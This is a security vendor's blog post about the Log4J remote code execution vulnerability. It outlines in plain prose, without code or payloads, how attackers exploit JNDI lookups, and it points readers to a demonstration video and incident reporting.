25 May 2022

How to mitigate the critical Log4J vulnerability exploitation

On 10 December, a new critical vulnerability known as Log4J was exposed, allowing unauthenticated remote code execution. SecurityHQ predicts that the ease of exploit, together with the vast range affected vendors, are the perfect recipe a fresh wave of Ransomware, just in time for Christmas!

Log4j 2 is an open-source Java logging library developed by the Apache Foundation. The active zero-day vulnerability has been seen to affect Log4J Java-based logging, to execute malicious code, and take over vulnerable systems.

A seemingly endless string of affected vendors can be tracked on GitHub. Please sit down before viewing this page!

You can read about the vulnerability on numerous vendor websites, however we wanted to provide real insights into the real-world exploitation method that we are currently observing in the wild….

So, here’s how the attack is likely to play out…

Stage 1: Attacker Injects an Absolute URL to a Vulnerable JNDI Lookup Method

The first stage of the attack involves the attacker creating a specially crafted request. The attacker is likely to use the LDAP request via the JNDI java framework.

Stage 2: Successful Response

If Stage 1 is successful, you will observe a 20X Web Server Response Code, indicating the server has responded. Now the server has started a lookup to decode the string and allow the attacker to decode the Base 64 string and execute the payload onto the target system.

Stage 3: System Compromise

Now as they say, the world is his oyster. From here on, he may use any number of tools and frameworks, such as PowerShell, to perform remote code execution and access to the server.

For more information, watch this video on Log4J Vulnerability Exploitation by Swapnil Bhosale, Security Consultant from SecurityHQ, for a demonstration of the Log4J vulnerability, with recommendations on how to mitigate the threat.

To report an incident, do so here. Or, for more information regarding the attack as it continues to evolve, contact a security expert.

Authors: Eleanor Barlow, Priyanka Agarwal, Swapnill Bhosale , Chris Cheyne

Company info: SecurityHQ